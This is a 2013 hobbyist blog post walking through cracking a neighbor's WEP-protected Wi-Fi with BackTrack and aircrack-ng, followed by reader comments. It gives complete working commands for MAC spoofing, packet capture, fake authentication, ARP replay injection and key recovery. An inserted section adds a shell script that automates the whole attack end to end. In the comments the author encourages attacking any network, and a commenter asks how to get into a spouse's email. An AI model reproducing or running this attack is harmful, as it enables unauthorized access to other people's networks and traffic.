Tuesday, January 1, 2013

Cracking WEP with BackTrack

I admit, one of my favorite things to do in BackTrack is to crack a good ole WiFi network. It opens up so many options and really brings me back to my roots, to why I stumbled upon BackTrack in the first place. I guess it's just thrilling; it gives me a sort of high to be in places I shouldn't. Being able to completely exploit an entire network as a local user is definitely fun and exciting. I do want to stress that even though we've all maybe done it once or twice, black hat hacking is entirely unethical and not condoned here. I may sound hypocritical, but I do not do anything malicious to the machines I exploit; I have permission to do so. This is an ethical hacker's website for information and security purposes only.
I'm far from a pro hacker, maybe intermediate at best. If anything looks out of the ordinary, feel free to email me with any questions or tips. I don't claim to be the best; I'm still learning. However, what I have learned thus far I'm willing to share, so here goes:

Today I'm going to demonstrate how insecure WEP encryption is over WiFi. In today's world a lot of people like to set it and forget it. I'm sure most readers have heard of Verizon, a pioneer in telecom. In my area Verizon offers high speed DSL and FiOS internet, great service most of the time. The problem is that their Westell DSL modem/WiFi routers come preset to use WEP encryption. I really wish they would catch on to this. My neighbor has DSL through Verizon: Westell modem, WEP WiFi!
Let's see what we can do!
We will be using the aircrack-ng suite (the air* tools). Fun, fun.

Fire up a shell and run the following commands:

1. airmon-ng

wlan1 is my interface. Interface names vary, so yours may be different.

Next, with the interface airmon-ng has given you (wlan1), run these four commands.

1. airmon-ng stop wlan1     (stops any monitor-mode instance on wlan1)
2. ifconfig wlan1 down        (takes wlan1 down so the MAC can be changed)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the MAC address)
4. airmon-ng start wlan1      (restarts the interface in monitor mode with the new MAC; on BackTrack 5 this creates a separate monitor interface, usually mon0, which inherits the spoofed MAC. Wherever I type wlan1 in the commands below, use the interface name airmon-ng reports.)
Below is what it looked like for me.

In some situations your network adapter may not be supported. I will compile a list of supported network adapters in the future, or you can Google it.
I have this one:

However, if it did work then you have successfully faked the MAC and it's time to keep moving.
The next thing, and this is obviously important, is to pick a network. Do this by running this command:

1. airodump-ng wlan1 (MAKE SURE YOU'RE USING YOUR INTERFACE, i.e. the monitor interface from the previous step)

After you run the command, wait a few minutes to get an accurate read on what wireless networks are out there. Hit CTRL+C to stop it and choose a good network whose ENC column says WEP.
I have the network I want to crack in my crosshairs. It's highlighted below:
The next thing we must do is configure airodump-ng to watch that specific network and write its traffic to a capture file (hackedwifi, or whatever you decide to name it). Note that the password itself is never transmitted; WEP encrypts every frame with RC4 under a key made of a 24-bit initialization vector plus the static WEP key, and what we are collecting is frames with distinct IVs (the #Data column), which aircrack-ng uses to recover the key statistically.
the command is as follows:

1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)

For me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1


This is what your output should look like:

Keep in mind, rather than opening several terminals I like to tab them using CTRL+SHIFT+T.
While airodump-ng is running, in a separate terminal run this command:

1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

For me the command looks like this:

aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1

In most cases, and this is what you want to happen, the output says "Association successful :-)" with a smiley face. If you get this you are on the right track. If not, email me and I will gladly help you out. One thing to check first: the -h MAC must be the address your monitor interface is actually using (macchanger -s shows it). The card only acknowledges frames addressed to its own MAC, so if -h does not match, the AP's replies go unacknowledged and it will eventually drop the association.


Now that you are associated with the access point, we use aireplay-ng's ARP request replay attack (-3) to create an abundance of data on the network: it captures an ARP request and retransmits it over and over, and each reply from the AP is a freshly encrypted frame with a new IV for the cracker. Run this command:

1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

For me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1


Now it's time to wait. You will notice airodump-ng going crazy collecting data. Personally, sometimes I leave the room or go do something else for about 20 minutes. What you want is to collect enough data for the cracker. Watch the #Data column; I like to wait until it's between 10,000 and 20,000 before I run the cracker. If aireplay-ng sits at 0 ARP requests and 0 packets sent, it has nothing to replay yet: it needs to see at least one ARP request from a real client on that network before the counters start moving.

OK, it's been about half an hour and it's time to run the cracker. Run this command:

1. aircrack-ng -b (bssid) (filename-01.cap)

If you forgot your file name, just type ls (or dir) and look for the .cap file. Note that every time you restart airodump-ng with the same -w name it starts a new numbered file (hackedwifi-02.cap and so on); you can pass several .cap files to aircrack-ng at once so the IVs from all of them count.
Mine looks like this:
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
If you did not sniff enough data it will say "Failed. Next try with N IVs" and keep retrying as more data arrives. If you did, it will say KEY FOUND! and look like this:

The key to the wireless network is: 6HSKV (a 5-character ASCII key, i.e. a 40-bit WEP key; aircrack-ng prints it in hex as well).
To prove it worked I took a screenshot in Windows 7.
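As an added example, not code from the post, here is the whole procedure above wrapped in one POSIX shell script, with two offline helpers that take the guesswork out of it: one pulls the monitor-mode interface name out of airmon-ng's output (so the mon0-versus-wlan1 question answers itself), and one reads the CSV that airodump-ng -w writes next to the .cap file so the IV (#Data) count can be polled rather than eyeballed. The function names, the sample airmon-ng text and the sample CSV are mine and constructed; assumed are the aircrack-ng 1.x CSV column order, BackTrack 5's "(monitor mode enabled on mon0)" wording, and root privileges for run_attack. The spoofed MAC is the one used throughout the post.

```shell
#!/bin/sh
# Added example (not from the post). run_attack needs root and the
# aircrack-ng suite; the helpers and the demo at the bottom run offline.

FAKE_MAC="00:11:22:33:44:55"      # spoofed MAC used throughout the post

# Print the monitor interface airmon-ng reports, or $2 if it reports none.
monitor_iface_from() {
    mon=$(printf '%s\n' "$1" | sed -n 's/.*monitor mode enabled on \([A-Za-z0-9]*\).*/\1/p' | head -n 1)
    if [ -n "$mon" ]; then printf '%s\n' "$mon"; else printf '%s\n' "$2"; fi
}

# Print "BSSID channel IVs ESSID" for every WEP network in an airodump-ng CSV.
# The AP table ends before the "Station MAC" section. ESSIDs containing a
# comma would shift the columns and are not handled here.
wep_networks_from_csv() {
    awk -F',' '
        function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
        /^Station MAC/ { exit }
        /^BSSID/       { next }
        NF >= 14 && trim($6) ~ /^WEP/ { print trim($1), trim($4), trim($11), trim($14) }
    ' "$1"
}

# IV count collected so far for one BSSID (0 if it is not in the file).
iv_count() {
    n=$(wep_networks_from_csv "$1" | awk -v b="$2" 'toupper($1) == toupper(b) { print $3; exit }')
    printf '%s\n' "${n:-0}"
}

# The post's steps end to end. Set BSSID, CHANNEL, ESSID first
# (IFACE, PREFIX and MIN_IVS are optional).
run_attack() {
    IFACE=${IFACE:-wlan1}; PREFIX=${PREFIX:-hackedwifi}; MIN_IVS=${MIN_IVS:-20000}
    : "${BSSID:?set BSSID}" "${CHANNEL:?set CHANNEL}" "${ESSID:?set ESSID}"
    airmon-ng stop "$IFACE" >/dev/null 2>&1 || true
    ifconfig "$IFACE" down
    macchanger --mac "$FAKE_MAC" "$IFACE" || return 1
    MON=$(monitor_iface_from "$(airmon-ng start "$IFACE")" "$IFACE")
    # -h must be the MAC the monitor interface really uses, or the card will
    # not ACK the AP's replies and the association is dropped; check first.
    macchanger -s "$MON" | grep -qi "$FAKE_MAC" || { echo "MAC spoof did not take on $MON" >&2; return 1; }
    airodump-ng -c "$CHANNEL" -w "$PREFIX" --bssid "$BSSID" "$MON" >/dev/null 2>&1 &
    DUMP=$!
    sleep 5
    aireplay-ng -1 0 -a "$BSSID" -h "$FAKE_MAC" -e "$ESSID" "$MON" || { kill "$DUMP"; return 1; }
    aireplay-ng -3 -b "$BSSID" -h "$FAKE_MAC" "$MON" >/dev/null 2>&1 &
    REPLAY=$!
    # Poll the newest CSV until the IV count reaches the post's threshold.
    while [ "$(iv_count "$(ls -t "$PREFIX"-*.csv 2>/dev/null | head -n 1)" "$BSSID")" -lt "$MIN_IVS" ]; do
        sleep 30
    done
    kill "$REPLAY" "$DUMP"
    # Pass every capture with this prefix so IVs from earlier runs count too.
    aircrack-ng -b "$BSSID" "$PREFIX"-*.cap
}

# Constructed airmon-ng output (not a real run) for the offline demo.
sample_airmon_output() {
    printf '%s\n' 'Interface   Chipset         Driver' '' \
        'wlan1       Ralink RT2870/3070   rt2800usb - [phy0]' \
        '                (monitor mode enabled on mon0)'
}

# Constructed airodump-ng CSV (not a real capture) for the offline demo.
sample_csv_file() {
    f="${TMPDIR:-/tmp}/wep-sample-$$.csv"
    cat > "$f" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:12:0E:55:29:13, 2013-01-01 12:00:00, 2013-01-01 12:31:00,  6,  54, WEP , WEP, OPN, -45,  1210,  15231,   0.  0.  0.  0,  12, 06B409983674, 
AA:BB:CC:DD:EE:01, 2013-01-01 12:00:00, 2013-01-01 12:31:00, 11,  54, WPA2, CCMP, PSK, -60,   880,      0,   0.  0.  0.  0,   7, HomeNet, 
AA:BB:CC:DD:EE:02, 2013-01-01 12:02:00, 2013-01-01 12:30:00,  1,  54, WEP , WEP, OPN, -71,   400,   3102,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2013-01-01 12:05:00, 2013-01-01 12:31:00, -30,   900, 00:12:0E:55:29:13, 
EOF
    printf '%s\n' "$f"
}

# Offline demonstration; run_attack is only for an AP you own.
echo "monitor interface: $(monitor_iface_from "$(sample_airmon_output)" wlan1)"
wep_networks_from_csv "$(sample_csv_file)"
```

Run as-is and it only parses the constructed samples, listing the two WEP networks with their channel and IV counts; to use it on your own AP, export BSSID, CHANNEL and ESSID and call run_attack. The WPA2 row is there to show the filter skipping it, and the MAC check before injection is the step most of the failed-association reports in the comments would have caught.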




Happy Hacking!

questions email me: davidjgeraway@gmail.com

24 comments:

  1. Although these steps are the most common way to crack a WEP network, I give you two thumbs up for the detailed explanation.
    Great job!

    ReplyDelete
    Replies
    1. Yorgos'
      Thanks for the thumbs up. Feel free to drop a link, and if you want to write an article for this site I will give you full credit for doing so :-)

      Delete
  2. Hey, I am unable to get the smiley face for this command:
    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    What could be the problem?

    ReplyDelete
    Replies
    1. Sometimes MAC filtering is enabled on the access point. This will prevent you from being associated with the AP. There are other ways of cracking WEP, which I will write an article on in the near future.

      Delete
  3. How can I backtrack a Yahoo account and have access to my husband's emails?

    ReplyDelete
  4. Hi, I can't figure out how to get my USB wireless card to be recognized as my interface. I have Windows 7 and I installed VMware 9 in the default location on the C: drive, and then I installed the BackTrack 5 R3 GNOME 64-bit ISO and plugged in my Alfa AWUS036NH USB. When I go to see what my interface is with ifconfig or airmon-ng there's nothing listed at all! Can someone help me with configuring this? My email is njleetage@yahoo.com and I am willing to pay someone via PayPal to get my interface working with my Alfa card so I will be able to use airmon-ng start wlan

    ReplyDelete
    Replies
    1. Did you add the USB device to your BackTrack machine in VMware?

      Delete
    2. Make sure you are looking in the correct places. If it's already active on Windows then VMware should relay the device to the Linux operating system. Try running just Kismet and see if it automatically detects the device. There are also a few options under the system management utility to find new hardware under the BackTrack menus.

      Delete
  5. Hmm... airmon-ng creates a new interface, mon0, for monitor mode. Don't you need to use that interface for airodump-ng?

    ReplyDelete
    Replies
    1. Typically, you use mon0 separately from the primary or secondary WiFi interface. This gives you the ability to still have functionality with your WLAN device and crack at the same time. However, I prefer my machine to be offline when cracking any WiFi. The only time I'm connected to an AP in BackTrack is to either:
      A. write tutorials.
      B. Hack things other than wifi.

      Delete
  6. Sir, can we hack other WiFi signals or only our own WiFi signal? Please help me.
    thakursanjeev2551@gmail.com

    ReplyDelete
  7. If I want to hack another WiFi signal, how many hours does this process take?

    ReplyDelete
    Replies
    1. To both of your consecutive comments:
      1. You may attempt to hack any WiFi you want. Please remember it is illegal to do anything arbitrary to an AP you don't own. I'm not saying everyone follows the rules :-)
      2. Hours? It depends on the encryption and the amount of network traffic. I've done it in as little as 10 minutes (could actually be a little less) and I've had to work really hard with others. This tutorial is for basic WEP cracking, mainly for beginners. Nobody has asked about WPA yet so I haven't written a tutorial for that.

      Delete
  8. Hi! I'm stuck on the last part where I do everything fine and then when I run aircrack-ng it says "no matching network found - check your bssid". Can you please help me out?

    ReplyDelete
  9. 11:39:44 Association successful :-) (AID: 1)
    aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55
    Captured 373158 packets (got 13575 ARP requests and 32210 ACKs), sent 65077 packets...(500 pps)
    Notice: got a deauth/disassoc packet. Is the source MAC associated ?
    Failed. Next try with 20000 IVs
    Any comments will help.

    ReplyDelete
  10. Sir, good day.

    Is there any best or new way to crack WEP? I followed your steps but it always says "Failed. Next try with blah blah". I've collected enough and sometimes more than enough, like 100k #Data, but still, it always fails... any idea what's wrong?

    ReplyDelete
  11. Hi David,
    I was using your method of cracking the WEP password, but I got this problem in which there was (0 pps) all the time, unlike your screenshot. I am awaiting your help in this matter. Here is the part in trouble:
    aireplay-ng -3 -b 94:D7:23:EC:80:C1 -h 00:11:22:33:44:55 wlan0
    You will be receiving a similar e-mail with a screenshot for your reference at your mail ID.

    HELP ME!!!!!!

    And by the way, your explanation was GREAT.
    THANKS!!!!!!

    ReplyDelete
  12. Hi Dave, many compliments for the great guide, but I have a problem.
    I did everything up to the association, which is "successful", but when I launch
    aireplay-ng -3 -b 94:D7:23:EC:80:C1 -h 00:11:22:33:44:55 wlan0
    I only get the read packets counter running: 0 ARP, 0 ACKs, 0 sent, 0 pps.

    What could it be?
    Thanks in advance
    F

    ReplyDelete
  13. Hey everyone, I want to thank you, it worked for me. But I used a push from another site too; I combined this with another guide I found on the Internet. The reason why it is failing for you guys is that every time you do the last step you are using a new cap file. You need to re-use the same cap. Here is the link: http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

    ReplyDelete
  14. I have no response with the airmon-ng command; the interfaces are not working.

    ReplyDelete
  15. When I entered the command "airodump-ng wlan0" I got a message saying "ioctl(SIOCSIWMODE) failed: Device or resource busy".

    ReplyDelete
  16. How do I create a new file?

    ReplyDelete